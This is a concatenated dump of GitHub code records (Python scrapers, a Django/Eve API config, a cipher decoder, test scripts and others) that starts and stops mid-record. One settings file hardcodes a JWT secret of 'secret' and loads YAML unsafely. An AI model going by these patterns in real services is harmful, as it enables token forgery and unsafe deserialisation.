ToolsForAyu.extract_with_xpath(\n response=book_info, query=\"div[2]//h1/a/@href\"\n )\n book_href = response.urljoin(book_href)\n\n book_intro = ToolsForAyu.extract_with_xpath(\n response=book_info, query='div[2]/div[@class=\"TwoBox02_06\"]/a/text()'\n )\n\n BookInfoItem = AyuItem(\n book_name=book_name,\n book_href=book_href,\n book_intro=book_intro,\n _table=TableEnum.book_info_list_table.value[\"value\"],\n _mongo_update_rule={\"book_name\": book_name},\n )\n yield BookInfoItem\n","repo_name":"shengchenyang/DemoSpider","sub_path":"DemoSpider/spiders/demo_mongo_async.py","file_name":"demo_mongo_async.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73782045513","text":"from floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.geo import stations_by_distance, stations_within_radius, stations_by_river, rivers_with_station, \\\n rivers_by_station_number\nfrom floodsystem.station import inconsistent_typical_range_stations\nfrom floodsystem.flood import stations_highest_rel_level\n\n\ndef run():\n stations = build_station_list()\n update_water_levels(stations)\n\n # Ask user to enter the threshold number– this value is used as the cut-off for deciding how many at-risk stations\n # there are.\n\n n = int(input(\"Enter the number of stations to set as threshold: \"))\n\n if n <= 0:\n raise ValueError(\"Error, N must be an integer greater than 0\")\n\n # Retrieve stations with no data available and report to user\n empty_data_stations = []\n\n for i in stations:\n if i.latest_level is None:\n empty_data_stations.append(i.name)\n\n print(f\"Warning: The data for the following stations is currently available:\"\n f\" {empty_data_stations} \")\n print(\"Monitor these stations manually\")\n\n list = []\n\n for station in stations_highest_rel_level(stations, n):\n town = station[0].town\n relative_water_level = station[1]\n list.append((town, relative_water_level))\n\n print()\n print(f\"{n}th highest relative water levels and their towns: \")\n print()\n\n severe_list = []\n high_list = []\n moderate_list = []\n low_list = []\n\n for i in list:\n if i[1] > 1.5:\n severe_list.append(i[0])\n elif i[1] > 1.2:\n high_list.append(i[0])\n elif i[1] > 1:\n moderate_list.append(i[0])\n elif i[1] < 1:\n low_list.append(i[0])\n\n print(f\"Severe risk of flooding in these towns: {severe_list}\")\n print(f\"High risk of flooding in these towns: {high_list}\")\n print(f\"Moderate risk of flooding in these towns: {moderate_list}\")\n print(f\"Low risk of flooding in these towns: {low_list}\")\n\n\nif __name__ == \"__main__\":\n print(\"*** Task 2G: CUED Part IA Flood Warning System ***\")\n run()\n\n","repo_name":"sushipackdushi/sp2112-Flood-Warning-System","sub_path":"Task2G.py","file_name":"Task2G.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23290526255","text":"from django.urls import path, include\nfrom core.views import UserViewSet, LoginOrRegisterView, PhoneVerificationView\nfrom rest_framework_nested import routers\n\nrouter = routers.DefaultRouter()\nrouter.register(r\"users\", UserViewSet, basename=\"user\")\n# router.register(r\"verification\", VerificationViewSet, basename=\"verification\")\nuser_router = routers.NestedDefaultRouter(router, r\"users\", lookup=\"user\")\nurlpatterns = [\n path(r\"login/\", LoginOrRegisterView.as_view()),\n path(r\"verification/phone\", PhoneVerificationView.as_view()),\n path(r\"\", include(router.urls)),\n path(r\"\", include(user_router.urls)),\n]\n","repo_name":"jokerwho/cookiecutter-drf","sub_path":"{{cookiecutter.project_name}}/apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73190807113","text":"import yaml\n\nwith open(\"./models/payment_v0.yaml\", \"r\") as f:\n schema = yaml.load(f.read())\n\n# Let's just use the local mongod instance. Edit as needed.\n# Please note that MONGO_HOST and MONGO_PORT could very well be left\n# out as they already default to a bare bones local 'mongod' instance.\nMONGO_HOST = 'localhost'\nMONGO_PORT = 27017\n\n# Skip these if your db has no auth. But it really should.\n# MONGO_USERNAME = ''\n# MONGO_PASSWORD = ''\n\nMONGO_DBNAME = 'form3'\n\npayments = {\n # 'title' tag used in item links. Defaults to the resource title minus\n # the final, plural 's'\n 'item_title': 'payment',\n 'allow_unknown': True,\n # We choose to override global cache-control directives for this resource.\n 'cache_control': 'max-age=10,must-revalidate',\n 'cache_expires': 10,\n 'schema': schema\n}\n\n\n# Enable reads (GET), inserts (POST)\n# read-only access to the endpoint).\nRESOURCE_METHODS = ['GET', 'POST']\n# Enable reads (GET), edits (PATCH), replacements (PUT) and deletes of\n# individual items (defaults to read-only item access).\nITEM_METHODS = ['GET', 'PATCH', 'PUT', 'DELETE']\n# ALLOWED_FILTERS = ['*']\n# VALIDATE_FILTERS = True\nID_FIELD = 'id'\nITEM_LOOKUP_FIELD = 'id'\nITEM_URL = 'regex(\"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\")'\nIF_MATCH = False\nITEMS = 'data'\nDOMAIN = {'payments': payments}\n\n# THis is for the JWT\nJWT_SECRET = \"secret\"\nJWT_ISSUER = \"form3\"\nJWT_AUDIENCES = ['admin']\n","repo_name":"e-nouri/form3_interivew","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71448441993","text":"\"\"\"Decode string which is encoded by simple substitution cipher\"\"\"\nimport json\nimport logging\nimport math\nimport secrets\nfrom typing import (Dict, List)\n\nimport tqdm\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s :: %(levelname)s :: %(message)s\",\n datefmt='%m-%d %H:%M:%S'\n)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass SimpleSubstitutionDecoder:\n \"\"\"Decode simple substitution cipher\"\"\"\n\n def __init__(self, text: str, ngrams: Dict[str, int], alphabet: List[str], start_swap_count=2,\n failure_count_limit=1000, swap_count_limit=3):\n self._text = list(text)\n self._alphabet = alphabet\n self._n = sum(ngrams.values())\n self._len = len(list(ngrams.keys())[0])\n self._floor = math.log10(0.01 / self._n)\n self._ngrams = self._calculate_log_probabilities(ngrams)\n self._start_swap_count = start_swap_count\n self._swap_count_limit = swap_count_limit\n self._failure_count_limit = failure_count_limit\n\n def _calculate_log_probabilities(self, ngrams: Dict[str, float]) -> Dict[str, float]:\n \"\"\"\n Calculate log probability for each ngram. The probability of a specific ngram is calculated\n by dividing the count of that ngram by the total number of ngram in our training corpus.\n The log probability is simply the logarithm of this number.\n \"\"\"\n for key in ngrams.keys():\n ngrams[key] = math.log10(ngrams[key] / self._n)\n return ngrams\n\n def decode(self, repeat_count):\n \"\"\"\n Make several repetitions of the decoding process and select the best result.\n \"\"\"\n max_score_text = ''\n max_score = -math.inf\n for _ in tqdm.tqdm(range(repeat_count)):\n score, text = self._decode_inner()\n if score > max_score:\n logger.info(score)\n max_score = score\n max_score_text = ''.join(text)\n logger.info(max_score_text)\n return max_score_text\n\n def _decode_inner(self):\n \"\"\"\n Main decode function. Implement hill-climbing algorithm.\n Swap swap_count symbols in the text.\n If after that transposition text became more \"closer\" to Russian then we apply this transposition.\n Otherwise we roll back this transposition and try other one. Repeat the described procedure some times.\n If max_fitness_score does not change already self._failure_count_limit times increase swap_count by 1.\n If swap_count became grater than self._swap_count_limit end the procedure.\n :return: text witch is more \"closer\" to Russian from all text variants.\n \"\"\"\n max_fitness_score_text = self._text.copy()\n max_fitness_score = self._get_fitness_score(max_fitness_score_text)\n failure_count = 0\n swap_count = self._start_swap_count\n while failure_count <= self._failure_count_limit and swap_count <= self._swap_count_limit:\n current_fitness_score_text = self._swap_alphabet_symbols(max_fitness_score_text.copy(), swap_count)\n current_fitness_score = self._get_fitness_score(current_fitness_score_text)\n if current_fitness_score > max_fitness_score:\n max_fitness_score = current_fitness_score\n max_fitness_score_text = current_fitness_score_text\n failure_count = 0\n swap_count = self._start_swap_count\n else:\n failure_count = failure_count + 1 if failure_count != self._failure_count_limit else 0\n swap_count = swap_count + 1 if failure_count == self._failure_count_limit else swap_count\n return max_fitness_score, max_fitness_score_text\n\n def _get_fitness_score(self, text):\n \"\"\"\n Calculate log probability score of the text. This log probability is used as the 'fitness' of a\n piece of text, a higher number means it is more likely to be decoded text,\n while a lower number means it is less likely to be decoded text.\n \"\"\"\n score = 0.0\n for i in range(len(text) - self._len):\n if ''.join(text[i:i + self._len]) in self._ngrams:\n score += self._ngrams[''.join(text[i:i + self._len])]\n else:\n score += self._floor\n return score\n\n def _swap_alphabet_symbols(self, text, number):\n \"\"\"\n Swap number of random chosen from self.alphabet symbols in text cyclically. Let number=3\n symbols2swap={'А','Б','В'} then all occurrences of 'A' will be replaced by 'Б', 'Б' will be replaced by 'В'\n and 'В' will be replaced by 'А'.\n :param text: text in which needs to swap symbols\n :param number: number of symbols to swap\n :return: text with symbols that are already swapped\n \"\"\"\n symbols2swap = set()\n while len(symbols2swap) != number:\n symbols2swap.add(secrets.choice(self._alphabet))\n symbols2swap = list(symbols2swap)\n for idx, symbol in enumerate(text):\n if symbol in symbols2swap:\n text[idx] = symbols2swap[symbols2swap.index(symbol) - 1]\n return text\n\n\nif __name__ == '__main__':\n russian_alphabet = ['А', 'Б', 'В', 'Г', 'Д', 'Е', 'Ё', 'Ж', 'З', 'И', 'Й', 'К', 'Л', 'М', 'Н', 'О', 'П', 'Р', 'С',\n 'Т', 'У', 'Ф', 'Х', 'Ц', 'Ч', 'Ш', 'Щ', 'Ъ', 'Ы', 'Ь', 'Э', 'Ю', 'Я', ' ']\n with open('ru_trigrams.json', 'r') as ngrams_file:\n ngrams_ = json.load(ngrams_file)\n with open('texts/text_to_decode_1.txt', 'r', encoding='utf-8') as text_file:\n text_ = text_file.read()\n decoder = SimpleSubstitutionDecoder(text_, ngrams_, russian_alphabet)\n decoded_text = decoder.decode(500)\n with open('result.txt', 'w', encoding='utf-8') as output_file:\n output_file.write(decoded_text)\n","repo_name":"BroodingKangaroo/bsu","sub_path":"simple_substitution_decoder/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19234115","text":"\nfrom googletranslate.googletranslate import main as gtranslate\n\n\ndef translate(word, item=None):\n \"\"\"\n python -m googletranslate.googletranslate -s \"translate.google.cn\" -r plain zh-CN \"word\"\n \"\"\"\n class Args:\n target: str = 'zh-CN'\n query: str = ''\n host: str = 'translate.google.com'\n proxy: str = ''\n alternative: str = 'en'\n type: str = 'plain'\n synonyms: bool = False\n definitions: bool = True\n examples: bool = False\n tkk: str = ''\n Args.host = item['root_path'] if item else 'translate.google.cn'\n Args.query = word\n trans = []\n trans_group = []\n result = gtranslate(Args)\n tags = []\n for line in result.split('\\n'):\n if not line:\n continue\n elif line == '=========':\n trans_group.append('
%s%s
' % (\n '
'.join(trans),\n ''.join(['' % t for t in tags[::-1]])\n ))\n trans = []\n tags = []\n continue\n elif line.startswith('^_^:'):\n line = '%s' % line\n elif line.startswith('0_0:'):\n line = '%s' % line\n elif line.startswith('#'):\n if tags:\n line = '<%s>%s' % (tags[-1], tags[-1], line)\n else:\n tags.append('ul')\n tags.append('li')\n line = '<%s><%s>%s' % (tags[-2], tags[-1], line)\n else:\n line = '%s' % line\n trans.append(line)\n if trans:\n trans_group.append('
%s%s
' % (\n '
'.join(trans),\n ''.join(['' % t for t in tags[::-1]])\n ))\n return trans_group\n\n\ndef init():\n title = 'Google 翻译'\n dict_uuid = 'gtranslate'\n about = 'google-translate-for-goldendict
https://github.com/xinebf/google-translate-for-goldendict'\n enable = True\n config = {\n 'title': title,\n 'uuid': dict_uuid,\n 'logo': 'google_translate.ico',\n 'about': about,\n 'root_path': 'translate.google.com',\n 'query': translate,\n 'cache': {},\n 'type': 'app',\n 'error': '',\n 'enable': enable,\n }\n return config\n","repo_name":"liuyug/flask-mdict","sub_path":"flask_mdict/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"27"} +{"seq_id":"18850788938","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom collections import OrderedDict\n\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\n\n# name (recursive clone, develop)\nrepos = [\n (\"litex\", (True, True)),\n (\"litedram\", (False, True)),\n (\"litescope\", (False, True)),\n (\"litejesd204b\", (False, True)),\n]\nrepos = OrderedDict(repos)\n\nif len(sys.argv) < 2:\n print(\"Available commands:\")\n print(\"- init\")\n print(\"- install\")\n print(\"- update\")\n exit()\n\nif sys.argv[1] == \"init\":\n for name in repos.keys():\n need_recursive, need_develop = repos[name]\n # clone repo (recursive if needed)\n print(\"[cloning \" + name + \"]...\")\n url = \"http://github.com/enjoy-digital/\" + name\n opts = \"--recursive\" if need_recursive else \"\"\n os.system(\"git clone \" + url + \" \" + opts)\n\nelif sys.argv[1] == \"install\":\n for name in repos.keys():\n need_recursive, need_develop = repos[name]\n # develop if needed\n print(\"[installing \" + name + \"]...\")\n if need_develop:\n os.chdir(os.path.join(current_path, name))\n os.system(\"python3 setup.py develop\")\n\nelif sys.argv[1] == \"update\":\n for name in repos.keys():\n # update\n print(\"[updating \" + name + \"]...\")\n os.chdir(os.path.join(current_path, name))\n os.system(\"git pull\")\n","repo_name":"m-labs/sayma_test","sub_path":"litex_setup.py","file_name":"litex_setup.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"19512843670","text":"import unittest\n\n\nclass Solution:\n def addDigits(self, num: int) -> int:\n str_num = str(num)\n nums = list(str_num)\n result = 0\n for num in nums:\n result += int(num)\n if result >= 10:\n result -= 9\n return result\n\n\nclass TestAddDigitst(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_add_digits_38(self):\n num = 38\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 2)\n\n def test_add_digits_1(self):\n num = 1\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 1)\n\n def test_add_digits_999(self):\n num = 999\n\n one_digit = self.sol.addDigits(num)\n\n self.assertEqual(one_digit, 9)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"brigitteunger/katas","sub_path":"test_add_digits.py","file_name":"test_add_digits.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42174826591","text":"import cv2\nimport numpy as np\nfrom shapely.geometry import Polygon\nimport pyclipper\n\nfrom concern.config import Configurable, State\nimport concern.webcv2 as webcv2\n\n\nclass SegDetectorRepresenter(Configurable):\n thresh = State(default=0.3)\n box_thresh = State(default=0.7)\n max_candidates = State(default=100)\n resize = State(default=False)\n\n dest = State(default='binary')\n\n def __init__(self, cmd={}, **kwargs):\n self.load_all(**kwargs)\n\n self.min_size = 3\n self.scale_ratio = 0.4\n if 'debug' in cmd:\n self.debug = cmd['debug']\n if 'thresh' in cmd:\n self.thresh = cmd['thresh']\n if 'box_thresh' in cmd:\n self.box_thresh = cmd['box_thresh']\n if 'dest' in cmd:\n self.dest = cmd['dest']\n\n def represent(self, batch, _pred):\n '''\n batch: (image, polygons, ignore_tags\n batch: a dict produced by dataloaders.\n image: tensor of shape (N, C, H, W).\n polygons: tensor of shape (N, K, 4, 2), the polygons of objective regions.\n ignore_tags: tensor of shape (N, K), indicates whether a region is ignorable or not.\n shape: the original shape of images.\n filename: the original filenames of images.\n pred:\n binary: text region segmentation map, with shape (N, 1, H, W)\n thresh: [if exists] thresh hold prediction with shape (N, 1, H, W)\n thresh_binary: [if exists] binarized with threshhold, (N, 1, H, W)\n '''\n images = batch['image']\n pred = _pred[self.dest]\n segmentation = self.binarize(pred)\n boxes_batch = []\n preds = []\n for batch_index in range(images.size(0)):\n height, width = batch['shape'][batch_index]\n boxes, single_pred = self.boxes_from_bitmap(\n _pred['binary'][batch_index],\n segmentation[batch_index], width, height)\n boxes_batch.append(boxes)\n preds.append(single_pred.reshape(1, *single_pred.shape))\n return boxes_batch, _pred\n\n def binarize(self, pred):\n return pred > self.thresh\n\n def boxes_from_bitmap(self, pred, _bitmap, dest_width, dest_height):\n '''\n _bitmap: single map with shape (1, H, W),\n whose values are binarized as {0, 1}\n '''\n assert _bitmap.size(0) == 1\n bitmap = _bitmap.data.cpu().numpy()[0] # The first channel\n pred = pred.cpu().detach().numpy()[0]\n height, width = bitmap.shape\n boxes = []\n _, contours, _ = cv2.findContours(\n (bitmap*255).astype(np.uint8),\n cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n if self.debug:\n bitmap = cv2.cvtColor(pred * 255, cv2.COLOR_GRAY2BGR)\n\n for contour in contours[:self.max_candidates]:\n points, sside = self.get_mini_boxes(contour)\n if sside < self.min_size:\n continue\n points = np.array(points)\n score = self.box_score_fast(pred, points.reshape(-1, 2))\n\n if self.debug:\n points = points.astype(np.int32)\n bitmap = cv2.polylines(\n bitmap, [points.reshape(-1, 2)], True, (255, 0, 0), 3)\n bitmap = cv2.putText(\n bitmap, str(round(score, 3)),\n (points[:, 0].min(), points[:, 1].min()),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0))\n if self.box_thresh > score:\n continue\n box = self.unclip(points).reshape(-1, 1, 2)\n box, sside = self.get_mini_boxes(box)\n if sside < self.min_size + 2:\n continue\n box = np.array(box)\n\n if not self.resize:\n dest_width = width\n dest_height = height\n\n box[:, 0] = np.clip(\n np.round(box[:, 0] / width * dest_width), 0, dest_width)\n box[:, 1] = np.clip(\n np.round(box[:, 1] / height * dest_height), 0, dest_height)\n boxes.append(box.tolist())\n\n if self.debug:\n webcv2.imshow('mask', bitmap)\n return boxes, bitmap\n\n def unclip(self, box):\n poly = Polygon(box)\n distance = poly.area * 1.5 / poly.length\n offset = pyclipper.PyclipperOffset()\n offset.AddPath(box, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)\n expanded = np.array(offset.Execute(distance))\n return expanded\n\n def get_mini_boxes(self, contour):\n bounding_box = cv2.minAreaRect(contour)\n points = sorted(list(cv2.boxPoints(bounding_box)), key=lambda x: x[0])\n\n index_1, index_2, index_3, index_4 = 0, 1, 2, 3\n if points[1][1] > points[0][1]:\n index_1 = 0\n index_4 = 1\n else:\n index_1 = 1\n index_4 = 0\n if points[3][1] > points[2][1]:\n index_2 = 2\n index_3 = 3\n else:\n index_2 = 3\n index_3 = 2\n\n box = [points[index_1], points[index_2],\n points[index_3], points[index_4]]\n return box, min(bounding_box[1])\n\n def box_score(self, bitmap, box):\n '''\n naive version of box score computation,\n only for helping principle understand.\n '''\n mask = np.zeros_like(bitmap, dtype=np.uint8)\n cv2.fillPoly(mask, box.reshape(1, 4, 2).astype(np.int32), 1)\n return cv2.mean(bitmap, mask)[0]\n\n def box_score_fast(self, bitmap, _box):\n h, w = bitmap.shape[:2]\n box = _box.copy()\n xmin = np.clip(np.floor(box[:, 0].min()).astype(np.int), 0, w - 1)\n xmax = np.clip(np.ceil(box[:, 0].max()).astype(np.int), 0, w - 1)\n ymin = np.clip(np.floor(box[:, 1].min()).astype(np.int), 0, h - 1)\n ymax = np.clip(np.ceil(box[:, 1].max()).astype(np.int), 0, h - 1)\n\n mask = np.zeros((ymax - ymin + 1, xmax - xmin + 1), dtype=np.uint8)\n box[:, 0] = box[:, 0] - xmin\n box[:, 1] = box[:, 1] - ymin\n cv2.fillPoly(mask, box.reshape(1, -1, 2).astype(np.int32), 1)\n return cv2.mean(bitmap[ymin:ymax+1, xmin:xmax+1], mask)[0]\n","repo_name":"Megvii-CSG/MegReader","sub_path":"structure/representers/seg_detector_representer.py","file_name":"seg_detector_representer.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":344,"dataset":"github-code","pt":"27"} +{"seq_id":"10458838890","text":"import time\n\nfrom selenium import webdriver\nimport os\n\nclass DynamicXpath():\n\n def _prepare_driver(self):\n driver_location = 'C:\\\\Users\\\\BlazejW\\\\selenium\\\\chromedriver.exe'\n os.environ['webdriver.chrome.driver'] = driver_location\n driver = webdriver.Chrome(driver_location)\n driver.get('https://learn.letskodeit.com/')\n return driver\n\n def test(self):\n driver = self._prepare_driver()\n driver.find_element_by_partial_link_text('Login').click()\n driver.implicitly_wait(5)\n\n driver.find_element_by_id('user_email').send_keys('test@email.com')\n driver.find_element_by_id('user_password').send_keys('abcabc')\n driver.find_element_by_xpath('//*[@id=\"new_user\"]/div[3]/input').click()\n\n driver.find_element_by_partial_link_text('All Courses').click()\n time.sleep(3)\n #driver.find_element_by_id('search-courses').send_keys('Java Script')\n\n #dynamic xpath\n _course = '//div[contains(@class, \"course-listing-title\")and contains(text(), \"{0}\")]'\n _course_locator = _course.format('JavaScript for beginners')\n\n element = driver.find_element_by_xpath(_course_locator)\n print(element)\n element.click()\n time.sleep(5)\n\nchrome_aut = DynamicXpath()\nchrome_aut.test()","repo_name":"bwielk/SeleniumAutomation","sub_path":"browser_interactions/dynamic_xpath.py","file_name":"dynamic_xpath.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36128174652","text":"from classes.game_object import GameObject\nimport pygame\nimport time\n\nclass Gorilla(GameObject):\n\tdef __init__(self, screen, left, top):\n\t\tself.top = top\n\t\tself.left = left\n\t\tself.screen = screen\n\t\tself.pos = (left, top)\n\t\tsuper(Gorilla, self).__init__(screen, self.pos)\n\t\n\tdef idle(self):\n\t\t# Get image from the source\n\t\timg = pygame.image.load(\"sprites\\\\gorilla-idle.png\").convert_alpha()\n\t\t\n\t\tself.screen.blit(img, self.pos)\n\t\n\tdef throw(self):\n\t\t# Get image from the source\n\t\timg = pygame.image.load(\"sprites\\\\gorilla-throwing.png\").convert_alpha()\n\t\t\n\t\t\n\t\tself.screen.blit(img, self.pos)\n\t\t# Throw banana(unimplemented feature)\n\t\ttime.sleep(2/3)\n\t\tself.idle()\n\t","repo_name":"ParsaDarbandsari/gorilla-game","sub_path":"classes/gorilla.py","file_name":"gorilla.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"42979720327","text":"import numpy as np\nfrom utilities.objective_functions import TSPObjectiveFunction\nfrom switch_network_LQUBO.switch_networks.switch_networks import SortingNetwork, PermutationNetwork\nfrom switch_network_LQUBO.form_LQUBO.form_LQUBO import LQUBO\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MaxNLocator\nfrom scipy import stats\nax = plt.figure().gca()\n\n\nclass ObjectiveFunction:\n def __init__(self, objective_function=None):\n if objective_function:\n self.objective_function = objective_function\n else:\n raise AttributeError('Objective function missing.')\n\n\nclass LocalQUBOQuality(ObjectiveFunction):\n \"\"\"\n For a specified objective function and LQUBO type, LocalQUBOQuality class has 2 useful visual functions that can\n be run from the command line.\n\n\n\n \"\"\"\n def __init__(self,\n objective_function=None,\n max_hd=None,\n activation_vector_hamming_dist=1,\n num_points=None,\n num_activation_vectors=None,\n network_type='minimum'):\n super().__init__(objective_function=objective_function)\n\n # Initialize switch network:\n # The default behavior here is to choose the smaller of either permutation or\n # sorting networks for the given input size.\n self.n_qap = self.objective_function.n\n\n if network_type == 'sorting':\n self.network = SortingNetwork(self.n_qap)\n elif network_type == 'permutation':\n self.network = PermutationNetwork(self.n_qap)\n elif network_type == 'minimum':\n s = SortingNetwork(self.n_qap)\n p = PermutationNetwork(self.n_qap)\n if s.depth <= p.depth:\n self.network = s\n else:\n self.network = p\n else:\n raise TypeError('Network type {} not recognized'.format(str(network_type)))\n\n if num_activation_vectors:\n self.n_qubo = num_activation_vectors\n else:\n self.n_qubo = self.network.depth\n\n if num_points:\n self.num_points = num_points\n else:\n self.num_points = 200\n\n # Initialize random bitstring\n self.q = np.random.randint(0, 2, size=self.n_qubo)\n self.p = self.network.permute(self.q)\n self.v = self.objective_function(self.p)\n self.activation_vec_hd = activation_vector_hamming_dist\n\n if type(objective_function) == TSPObjectiveFunction:\n self.OF_type = 'TSP'\n else:\n self.OF_type = 'QAP'\n\n self.max_hd = max_hd\n\n self.form_qubo = LQUBO(objective_function=self.objective_function,\n switch_network=self.network,\n num_activation_vectors=self.n_qubo,\n activation_vec_hamming_dist=self.activation_vec_hd,\n max_hamming_dist=self.max_hd).form_lqubo(self.q)\n\n self.qubo = np.zeros((self.n_qubo, self.n_qubo))\n self.basis_matrix = []\n\n for i in range(self.n_qubo):\n self.basis_matrix.append(self.form_qubo[1][i])\n\n self.additive_constant = self.form_qubo[2]\n for i in range(self.n_qubo):\n for j in range(self.n_qubo):\n if i <= j:\n self.qubo[i][j] = self.form_qubo[0][(i, j)]\n\n def q_q_plot(self, hamming_dist):\n\n \"\"\"\n Given a specified hamming dist (int), q_q_plot will produce a Q-Q scatter plot of the LQUBO change in objective\n function versus the actual change in objective function.\n \"\"\"\n\n if hamming_dist:\n hamming_dist = hamming_dist\n else:\n raise AttributeError('Hamming dist missing.')\n\n def swap(input_list, first_entry, second_entry):\n input_list[first_entry], input_list[second_entry] = input_list[second_entry], input_list[first_entry]\n return input_list\n\n def random_binary(binary):\n for index in range(hamming_dist):\n swap(binary, index, np.random.randint(self.n_qubo))\n return binary\n\n # delta q of specified hamming dist\n hd = []\n x = []\n y = []\n\n for i in range(self.num_points):\n hd.append(np.zeros(self.n_qubo))\n\n for i in range(len(hd)):\n for j in range(hamming_dist):\n hd[i][j] = 1\n # only swap first n_qubo qubits to preserve total weight qubit\n random_binary(hd[i][:self.n_qubo])\n\n for vec in hd:\n q_new = np.mod(self.q + np.matmul(vec[:self.n_qubo], self.basis_matrix), 2)\n p_new = self.network.permute(q_new)\n v_new = self.objective_function(p_new)\n x.append(v_new - self.v)\n y.append(np.matmul(np.matmul(vec, self.qubo), np.transpose(vec)) + self.additive_constant)\n\n plt.scatter(x, y, label='HD = {}'.format(hamming_dist))\n\n plt.xlabel(\"true delta obj\")\n plt.ylabel(\"local qubo delta obj\")\n plt.title('n = {} {}, Activation Vector HD = {} '.format(self.n_qap, self.OF_type, self.activation_vec_hd))\n\n plt.axhline(y=0, color='k')\n plt.axvline(x=0, color='k')\n plt.legend(loc='upper left')\n plt.show()\n\n def plot_r_squared(self):\n\n \"\"\"\n plot_r_squared function will take objective function from the base class and produce multiple scatter plots to\n retrieve the R squared value for a specified hamming distance. Then for a hamming dist from 1 to 20 it will\n produce a plot of the R squared val versus the input hamming dist.\n \"\"\"\n\n def swap(input_list, first_entry, second_entry):\n input_list[first_entry], input_list[second_entry] = input_list[second_entry], input_list[first_entry]\n return input_list\n\n def random_binary(binary):\n for index in range(hamming_dist):\n swap(binary, index, np.random.randint(self.n_qubo))\n return binary\n\n r_val = []\n hamming_weight = []\n for hamming_dist in range(20):\n\n hamming_dist = hamming_dist + 1\n hd = []\n x = []\n y = []\n\n for i in range(self.num_points):\n hd.append(np.zeros(self.n_qubo))\n\n for i in range(len(hd)):\n for j in range(hamming_dist):\n hd[i][j] = 1\n random_binary(hd[i])\n\n for vec in hd:\n q_new = np.mod(self.q + np.matmul(vec, self.basis_matrix), 2)\n p_new = self.network.permute(q_new)\n v_new = self.objective_function(p_new)\n x.append(v_new - self.v)\n y.append(np.matmul(np.matmul(vec, self.qubo), np.transpose(vec)))\n\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)\n r_val.append(r_value**2)\n hamming_weight.append(hamming_dist)\n\n plt.plot(hamming_weight, r_val, label='n = {} {}, activation vector HD = {}'.format(self.n_qap,\n self.OF_type,\n self.activation_vec_hd))\n\n plt.scatter(hamming_weight, r_val)\n plt.xticks(hamming_weight)\n plt.xlabel(\"Hamming dist\")\n plt.ylabel(\"R Squared\")\n plt.title('Hamming dist of LQUBO vs R Squared of scatter plot')\n plt.legend(loc='best')\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n plt.show()\n\n\n","repo_name":"seangholson/lqubo","sub_path":"switch_network_LQUBO/quality_of_LQUBO_and_methods/approx_quality.py","file_name":"approx_quality.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25887966046","text":"\n###Version of online request searcher\n###for general use; takes in user input\nimport requests, bs4, xlrd, re\n\nstopwords = ('a', 'able', 'all', 'also', 'am', 'an', 'and', 'any', 'are', 'as', 'ask', 'at', 'away',\n 'b', 'be', 'been', 'best', 'both', 'but', 'by', 'c', 'came', 'can', 'cant', 'co', 'com', 'come',\n 'd', 'did', 'do', 'does', 'done', 'down', 'e', 'each', 'edu', 'eg', 'else', 'et', 'etc', 'even', 'ever', 'ex',\n 'f', 'far', 'few', 'five', 'for', 'four', 'from', 'g', 'get', 'gets', 'go', 'goes', 'gone', 'got',\n 'h', 'had', 'has', 'have', 'he', 'help', 'her', 'here', 'hers', 'hi', 'him', 'his', 'how',\n 'i', 'ie', 'if', 'in', 'inc', 'into', 'is', 'it', 'its', 'j', 'just', 'k', 'keep', 'kept', 'know',\n 'l', 'last', 'less', 'lest', 'let', 'like', 'look', 'ltd', 'm', 'many', 'may', 'me', 'mean', 'more',\n 'most', 'much', 'must', 'my', 'n', 'name', 'nd', 'near', 'need', 'new', 'next', 'nine', 'no', 'non', 'none',\n 'nor', 'not', 'now', 'o', 'of', 'off', 'oh', 'ok', 'okay', 'old', 'on', 'once', 'one', 'ones', 'only', 'onto',\n 'or', 'our', 'ours', 'out', 'over', 'own', 'p', 'per', 'plus', 'q', 'que', 'qv', 'r', 'rd', 're', 's', 